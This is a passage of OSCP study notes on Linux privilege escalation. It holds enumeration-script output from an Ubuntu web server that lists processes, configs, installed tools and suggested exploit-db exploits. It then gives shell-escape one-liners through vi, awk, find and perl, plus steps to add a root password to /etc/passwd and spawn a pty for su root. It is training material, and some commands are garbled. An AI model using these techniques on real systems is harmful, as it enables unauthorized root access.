root 204 Jul28 0:00 [scsi_eh_12]
root 205 Jul28 0:00 [scsi_tmf_12]
root 206 Jul28 0:00 [scsi_eh_13]
root 207 Jul28 0:00 [scsi_tmf_13]
root 208 Jul28 0:00 [scsi_eh_14]
root 209 Jul28 0:00 [scsi_tmf_14]
root 210 Jul28 0:00 [scsi_eh_15]
root 211 Jul28 0:00 [scsi_tmf_15]
root 212 Jul28 0:00 [scsi_eh_16]
root 213 Jul28 0:00 [scsi_tmf_16]
root 214 Jul28 0:00 [scsi_eh_17]
root 215 Jul28 0:00 [scsi_tmf_17]
root 216 Jul28 0:00 [scsi_eh_18]
root 217 Jul28 0:00 [scsi_tmf_18]
root 218 Jul28 0:00 [scsi_eh_19]
root 219 Jul28 0:00 [scsi_tmf_19]
root 220 Jul28 0:00 [scsi_eh_20]
root 221 Jul28 0:00 [scsi_tmf_20]
root 222 Jul28 0:00 [scsi_eh_21]
root 223 Jul28 0:00 [scsi_tmf_21]
root 224 Jul28 0:00 [scsi_eh_22]
root 225 Jul28 0:00 [scsi_tmf_22]
root 226 Jul28 0:00 [scsi_eh_23]
root 227 Jul28 0:00 [scsi_tmf_23]
root 228 Jul28 0:00 [scsi_eh_24]
root 229 Jul28 0:00 [scsi_tmf_24]
root 230 Jul28 0:00 [scsi_eh_25]
root 231 Jul28 0:00 [scsi_tmf_25]
root 232 Jul28 0:00 [scsi_eh_26]
root 233 Jul28 0:00 [scsi_tmf_26]
root 234 Jul28 0:00 [scsi_eh_27]
root 235 Jul28 0:00 [scsi_tmf_27]
root 236 Jul28 0:00 [scsi_eh_28]
root 237 Jul28 0:00 [scsi_tmf_28]
root 238 Jul28 0:00 [scsi_eh_29]
root 239 Jul28 0:00 [scsi_tmf_29]
root 240 Jul28 0:00 [scsi_eh_30]
root 241 Jul28 0:00 [scsi_tmf_30]
root 242 Jul28 0:00 [scsi_eh_31]
root 243 Jul28 0:00 [scsi_tmf_31]
root 272 Jul28 0:00 [bioset]
root 274 Jul28 0:00 [kworker/0:1H]
root 275 Jul28 0:00 [kworker/1:1H]
root 297 Jul28 0:00 [jbd2/sda1-8]
root 298 Jul28 0:00 [ext4-rsv-conver]
root 324 Jul28 0:00 /lib/systemd/systemd-journald
root 346 Jul28 0:17 [kworker/0:3]
root 351 Jul28 0:00 /lib/systemd/systemd-udevd
systemd+ 423 Jul28 0:00 /lib/systemd/systemd-timesyncd
root 549 Jul28 0:00 [nfit]
root 631 Jul28 0:00 [edac-poller]
root 816 Jul28 0:00 /usr/sbin/ModemManager
syslog 822 Jul28 0:00 /usr/sbin/rsyslogd
root 827 Jul28 0:00 /usr/sbin/cron
avahi 828 Jul28 0:00 avahi-daemon:
root 830 Jul28 0:00 /usr/sbin/acpid
root 843 Jul28 0:00 /usr/lib/accountsservice/accounts-daemon
message+ 844 Jul28 0:00 /usr/bin/dbus-daemon
avahi 873 Jul28 0:00 avahi-daemon:
root 879 Jul28 0:00 /usr/sbin/NetworkManager
root 880 Jul28 0:00 /lib/systemd/systemd-logind
root 881 Jul28 0:00 /usr/lib/snapd/snapd
root 902 Jul28 0:00 /usr/sbin/irqbalance
root 913 Jul28 0:00 /usr/lib/policykit-1/polkitd
root 931 Jul28 0:00 /usr/sbin/lightdm
root 938 Jul28 0:00 /usr/sbin/sshd
nobody 956 Jul28 0:00 proftpd:
mysql 962 Jul28 0:04 /usr/sbin/mysqld
root 972 Jul28 0:01 /usr/lib/xorg/Xorg
root 1000 Jul28 0:00 lightdm
lightdm 1003 Jul28 0:00 /lib/systemd/systemd
lightdm 1004 Jul28 0:00 (sd-pam)
lightdm 1011 Jul28 0:00 /bin/sh
lightdm 1016 Jul28 0:00 /usr/bin/dbus-daemon
lightdm 1017 Jul28 0:01 /usr/sbin/unity-greeter
lightdm 1019 Jul28 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
lightdm 1024 Jul28 0:00 /usr/bin/dbus-daemon
nobody 1032 Jul28 0:00 /usr/sbin/dnsmasq
lightdm 1056 Jul28 0:00 /usr/lib/at-spi2-core/at-spi2-registryd
lightdm 1070 Jul28 0:00 /usr/lib/gvfs/gvfsd
lightdm 1114 Jul28 0:00 /usr/lib/gvfs/gvfsd-fuse
lightdm 1167 Jul28 0:00 /usr/lib/dconf/dconf-service
root 1203 Jul28 0:00 lightdm
lightdm 1207 Jul28 0:00 upstart
lightdm 1209 Jul28 0:00 nm-applet
lightdm 1211 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-messages/indicator-messages-service
lightdm 1212 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-bluetooth/indicator-bluetooth-service
lightdm 1213 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service
lightdm 1220 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-datetime/indicator-datetime-service
lightdm 1222 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-keyboard/indicator-keyboard-service
lightdm 1224 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service
lightdm 1225 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-session/indicator-session-service
lightdm 1239 Jul28 0:00 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service
lightdm 1266 Jul28 0:00 /usr/bin/pulseaudio
rtkit 1267 Jul28 0:00 /usr/lib/rtkit/rtkit-daemon
lightdm 1278 Jul28 0:00 /usr/lib/unity-settings-daemon/unity-settings-daemon
root 1296 Jul28 0:00 /usr/lib/upower/upowerd
colord 1309 Jul28 0:00 /usr/lib/colord/colord
whoopsie 1325 Jul28 0:00 /usr/bin/whoopsie
root 1338 Jul28 0:00 /sbin/agetty
root 1373 Jul28 0:00 /usr/sbin/apache2
root 1553 Jul28 0:00 /usr/sbin/cupsd
root 1554 Jul28 0:00 /usr/sbin/cups-browsed
www-data 1556 Jul28 0:00 /usr/sbin/apache2
www-data 1557 Jul28 0:00 /usr/sbin/apache2
www-data 1558 Jul28 0:00 /usr/sbin/apache2
www-data 1559 Jul28 0:00 /usr/sbin/apache2
www-data 1560 Jul28 0:00 /usr/sbin/apache2
root 1777 Jul28 0:00 [kworker/1:1]
root 1800 Jul28 0:00 [kworker/0:0]
lightdm 1849 Jul28 0:00 /usr/lib/x86_64-linux-gnu/notify-osd
root 1892 Jul28 0:00 /sbin/dhclient
root 2035 Jul28 0:00 [kworker/1:0]
root 2036 Jul28 0:00 /sbin/dhclient
www-data 2143 Jul28 0:01 /usr/sbin/apache2
www-data 2144 Jul28 0:00 /usr/sbin/apache2
www-data 2154 Jul28 0:00 /usr/sbin/apache2
www-data 2155 Jul28 0:00 /usr/sbin/apache2
www-data 2156 Jul28 0:00 /usr/sbin/apache2
www-data 2220 00:14 0:00 [sh]
root 2222 00:15 0:00 [kworker/u4:1]
root 2233 00:29 0:00 [kworker/u4:2]
www-data 2235 00:33 0:00 sh
www-data 2236 00:33 0:00 /bin/sh
www-data 2240 00:35 0:00 python
www-data 2563 00:35 0:00 /bin/sh
www-data 2564 00:35 0:00 ps
www-data 2565 00:35 0:00 awk [+] Apache Version and Modules
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)
Compiled in modules:
core.c
mod_so.c
mod_watchdog.c
http_core.c
mod_log_config.c
mod_logio.c
mod_version.c
mod_unixd.c [+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
#<Directory /srv/>
# Options Indexes FollowSymLinks
# AllowOverride None
# Require all granted
#</Directory>
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16 [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER... root 18 Jul28 0:00 [kworker/1:0H]
root 297 Jul28 0:00 [jbd2/sda1-8]
root 89 Jul28 0:00 [bioset]
root 91 Jul28 0:00 [bioset]
root 19 Jul28 0:00 [kdevtmpfs]
root 92 Jul28 0:00 [bioset]
root 13 Jul28 0:00 [cpuhp/1]
root 1553 Jul28 0:00 /usr/sbin/cupsd
root 1000 Jul28 0:00 lightdm
Possible Related Packages:
liblightdm-gobject-1-0:amd64 1.18.3-0ubuntu1.1 LightDM GObject client library
lightdm 1.18.3-0ubuntu1.1 Display Manager
root 203 Jul28 0:00 [scsi_tmf_11]
root 197 Jul28 0:00 [scsi_tmf_8]
root 24 Jul28 0:00 [kcompactd0]
root 631 Jul28 0:00 [edac-poller]
root 35 Jul28 0:00 [watchdogd]
root 219 Jul28 0:00 [scsi_tmf_19]
root 816 Jul28 0:00 /usr/sbin/ModemManager
root 96 Jul28 0:00 [scsi_tmf_1]
root 32 Jul28 0:00 [ata_sff]
root 88 Jul28 0:00 [bioset]
root 2222 00:15 0:00 [kworker/u4:1]
root 1777 Jul28 0:00 [kworker/1:1]
root 85 Jul28 0:00 [bioset]
root 189 Jul28 0:00 [scsi_tmf_4]
root 205 Jul28 0:00 [scsi_tmf_12]
root 207 Jul28 0:00 [scsi_tmf_13]
root 38 Jul28 0:00 [kauditd]
root 232 Jul28 0:00 [scsi_eh_26]
root 272 Jul28 0:00 [bioset]
root 186 Jul28 0:00 [scsi_eh_3]
root 1203 Jul28 0:00 lightdm
Possible Related Packages:
liblightdm-gobject-1-0:amd64 1.18.3-0ubuntu1.1 LightDM GObject client library
lightdm 1.18.3-0ubuntu1.1 Display Manager
root 194 Jul28 0:00 [scsi_eh_7]
root 226 Jul28 0:00 [scsi_eh_23]
root 95 Jul28 0:00 [scsi_eh_1]
root 224 Jul28 0:00 [scsi_eh_22]
root 42 Jul28 0:00 [ecryptfs-kthrea]
root 229 Jul28 0:00 [scsi_tmf_24]
root 236 Jul28 0:00 [scsi_eh_28]
root 87 Jul28 0:00 [bioset]
root 239 Jul28 0:00 [scsi_tmf_29]
root 241 Jul28 0:00 [scsi_tmf_30]
root 231 Jul28 0:00 [scsi_tmf_25]
root 324 Jul28 0:00 /lib/systemd/systemd-journald
root 7 Jul28 0:00 [rcu_sched]
root 235 Jul28 0:00 [scsi_tmf_27]
root 214 Jul28 0:00 [scsi_eh_17]
root 879 Jul28 0:00 /usr/sbin/NetworkManager
Possible Related Packages:
libnm0:amd64 1.2.6-0ubuntu0.16.04.1 GObject-based client library for NetworkManager
root 234 Jul28 0:00 [scsi_eh_27]
root 10 Jul28 0:00 [lru-add-drain]
root 549 Jul28 0:00 [nfit]
root 22 Jul28 0:00 [oom_reaper]
root 28 Jul28 0:00 [kintegrityd]
root 6 Jul28 0:00 [ksoftirqd/0]
root 222 Jul28 0:00 [scsi_eh_21]
root 29 Jul28 0:00 [bioset]
root 94 Jul28 0:00 [scsi_tmf_0]
root 213 Jul28 0:00 [scsi_tmf_16]
root 243 Jul28 0:00 [scsi_tmf_31]
root 208 Jul28 0:00 [scsi_eh_14]
root 346 Jul28 0:17 [kworker/0:3]
root 230 Jul28 0:00 [scsi_eh_25]
root 93 Jul28 0:00 [scsi_eh_0]
root 1338 Jul28 0:00 /sbin/agetty
root 102 Jul28 0:00 [ipv6_addrconf]
root 211 Jul28 0:00 [scsi_tmf_15]
root 298 Jul28 0:00 [ext4-rsv-conver]
root 218 Jul28 0:00 [scsi_eh_19]
root 27 Jul28 0:00 [crypto]
root 1892 Jul28 0:00 /sbin/dhclient
root 41 Jul28 0:00 [bioset]
root 193 Jul28 0:00 [scsi_tmf_6]
root 16 Jul28 0:00 [ksoftirqd/1]
root 9 Jul28 0:00 [migration/0]
root 215 Jul28 0:00 [scsi_tmf_17]
root 240 Jul28 0:00 [scsi_eh_30]
root 1296 Jul28 0:00 /usr/lib/upower/upowerd
root 34 Jul28 0:00 [devfreq_wq]
root 192 Jul28 0:00 [scsi_eh_6]
root 201 Jul28 0:00 [scsi_tmf_10]
root 881 Jul28 0:00 /usr/lib/snapd/snapd
Possible Related Packages:
libsnapd-glib1:amd64 1.13-0ubuntu0.16.04.1 GLib snapd library
snapd 2.28.5 Daemon and tooling that enable snap packages
snapd-login-service 1.13-0ubuntu0.16.04.1 Daemon to allow non-root access to snapd
ubuntu-core-launcher 2.28.5 Transitional package for snapd
root 238 Jul28 0:00 [scsi_eh_29]
root 233 Jul28 0:00 [scsi_tmf_26]
root 1800 Jul28 0:00 [kworker/0:0]
root 123 Jul28 0:00 [charger_manager]
root 227 Jul28 0:00 [scsi_tmf_23]
root 237 Jul28 0:00 [scsi_tmf_28]
root 220 Jul28 0:00 [scsi_eh_20]
root 938 Jul28 0:00 /usr/sbin/sshd
root 12 Jul28 0:00 [cpuhp/0]
root 33 Jul28 0:00 [md]
root 843 Jul28 0:00 /usr/lib/accountsservice/accounts-daemon
root 830 Jul28 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.26-1ubuntu2 Advanced Configuration and Power Interface event daemon
root 190 Jul28 0:00 [scsi_eh_5]
root 39 Jul28 0:00 [kswapd0]
root 199 Jul28 0:00 [scsi_tmf_9]
root 209 Jul28 0:00 [scsi_tmf_14]
root 225 Jul28 0:00 [scsi_tmf_22]
root 196 Jul28 0:00 [scsi_eh_8]
root 972 Jul28 0:01 /usr/lib/xorg/Xorg
Possible Related Packages:
xserver-xorg-core-hwe-16.04 2:1.19.3-1ubuntu1~16.04.4 Xorg X server - core server
xserver-xorg-legacy-hwe-16.04 2:1.19.3-1ubuntu1~16.04.4 setuid root Xorg server wrapper
root 210 Jul28 0:00 [scsi_eh_15]
root 275 Jul28 0:00 [kworker/1:1H]
root 185 Jul28 0:00 [scsi_tmf_2]
root 880 Jul28 0:00 /lib/systemd/systemd-logind
root 30 Jul28 0:00 [kblockd]
root 913 Jul28 0:00 /usr/lib/policykit-1/polkitd
root 191 Jul28 0:00 [scsi_tmf_5]
root 40 Jul28 0:00 [vmstat]
root 198 Jul28 0:00 [scsi_eh_9]
root 204 Jul28 0:00 [scsi_eh_12]
root 216 Jul28 0:00 [scsi_eh_18]
root 931 Jul28 0:00 /usr/sbin/lightdm
Possible Related Packages:
liblightdm-gobject-1-0:amd64 1.18.3-0ubuntu1.1 LightDM GObject client library
lightdm 1.18.3-0ubuntu1.1 Display Manager
root 14 Jul28 0:00 [watchdog/1]
root 23 Jul28 0:00 [writeback]
root 1554 Jul28 0:00 /usr/sbin/cups-browsed
Possible Related Packages:
cups-browsed 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - cups-browsed
root 86 Jul28 0:00 [bioset]
root 187 Jul28 0:00 [scsi_tmf_3]
root 11 Jul28 0:00 [watchdog/0]
root 200 Jul28 0:00 [scsi_eh_10]
root 25 Jul28 0:00 [ksmd]
root 90 Jul28 0:00 [bioset]
root 21 Jul28 0:00 [khungtaskd]
root 274 Jul28 0:00 [kworker/0:1H]
root 1373 Jul28 0:00 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.18-2ubuntu3.5 Apache HTTP Server
apache2-bin 2.4.18-2ubuntu3.5 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.18-2ubuntu3.5 Apache HTTP Server (common files)
apache2-utils 2.4.18-2ubuntu3.5 Apache HTTP Server (utility programs for web servers)
libapache2-mod-php7.0 7.0.22-0ubuntu0.16.04.1 server-side, HTML-embedded scripting language (Apache 2 module)
root 184 Jul28 0:00 [scsi_eh_2]
root 2036 Jul28 0:00 /sbin/dhclient
root 212 Jul28 0:00 [scsi_eh_16]
root 4 Jul28 0:00 [kworker/0:0H]
root 8 Jul28 0:00 [rcu_bh]
root 182 Jul28 0:00 [ttm_swap]
root 20 Jul28 0:00 [netns]
root 217 Jul28 0:00 [scsi_tmf_18]
root 195 Jul28 0:00 [scsi_tmf_7]
root 202 Jul28 0:00 [scsi_eh_11]
root 827 Jul28 0:00 /usr/sbin/cron
Possible Related Packages:
anacron 2.3-23 cron-like program that doesn't go by time
cron 3.0pl1-128ubuntu2 process scheduling daemon
root 902 Jul28 0:00 /usr/sbin/irqbalance
Possible Related Packages:
irqbalance 1.1.0-2ubuntu1 Daemon to balance interrupts for SMP systems
root 2 Jul28 0:00 [kthreadd]
root 242 Jul28 0:00 [scsi_eh_31]
root 223 Jul28 0:00 [scsi_tmf_21]
root 83 Jul28 0:00 [kthrotld]
root 2233 00:29 0:00 [kworker/u4:2]
root 26 Jul28 0:00 [khugepaged]
root 351 Jul28 0:00 /lib/systemd/systemd-udevd
root 228 Jul28 0:00 [scsi_eh_24]
root 1 Jul28 0:04 /sbin/init
Possible Related Packages:
busybox-initramfs 1:1.22.0-15ubuntu1 Standalone shell setup for initramfs
init 1.29ubuntu4 System-V-like init utilities - metapackage
init-system-helpers 1.29ubuntu4 helper tools for all init systems
initramfs-tools 0.122ubuntu8.9 generic modular initramfs generator (automation)
initramfs-tools-bin 0.122ubuntu8.9 binaries used by initramfs-tools
initramfs-tools-core 0.122ubuntu8.9 generic modular initramfs generator (core tools)
initscripts 2.88dsf-59.3ubuntu2 scripts for initializing and shutting down the system
insserv 1.14.0-5ubuntu3 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-8ubuntu1.16.04.3 minimal libc subset for use with initramfs
libmirprotobuf3:amd64 0.26.3+16.04.20170605-0ubuntu1.1 Display server for Ubuntu - RPC definitions
lsb-base 9.20160110ubuntu0.2 Linux Standard Base init script functionality
ncurses-base 6.0+20160213-1ubuntu1 basic terminal type definitions
ncurses-term 6.0+20160213-1ubuntu1 additional terminal type definitions
sysvinit-utils 2.88dsf-59.3ubuntu2 System-V-like utilities
upstart 1.13.2-0ubuntu21.1 event-based init daemon - essential binaries
xinit 1.3.4-3ubuntu0.1 X server initialisation tool
root 124 Jul28 0:00 [bioset]
root 221 Jul28 0:00 [scsi_tmf_20]
root 188 Jul28 0:00 [scsi_eh_4]
root 206 Jul28 0:00 [scsi_eh_13]
root 84 Jul28 0:00 [acpi_thermal_pm]
root 2035 Jul28 0:00 [kworker/1:0]
root 15 Jul28 0:00 [migration/1] [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... [+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp [+] Related Shell Escape Sequences... vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";' [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c Finished
=================================================================================================

8. Edit the password file in the folder /etc.

edit /etc/passwd

OSCP Learning Notes - Privilege Escalation

OSCP Learning Notes - Privilege Escalation

Generate the MD5-based password of "test" through the tool opsnssl.

opensssl passwd -

OSCP Learning Notes - Privilege Escalation

Copy and paste the MD5 password into passwd file.

OSCP Learning Notes - Privilege Escalation

9.In the shell mode perform the following command and get the root privilege.

python -c 'import pty; pty.spawn("/bin/bash")'

OSCP Learning Notes - Privilege Escalation

su root

OSCP Learning Notes - Privilege Escalation

More Privilege Escalation Guide:

Linux https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows https://www.fuzzysecurity.com/tutorials/16.html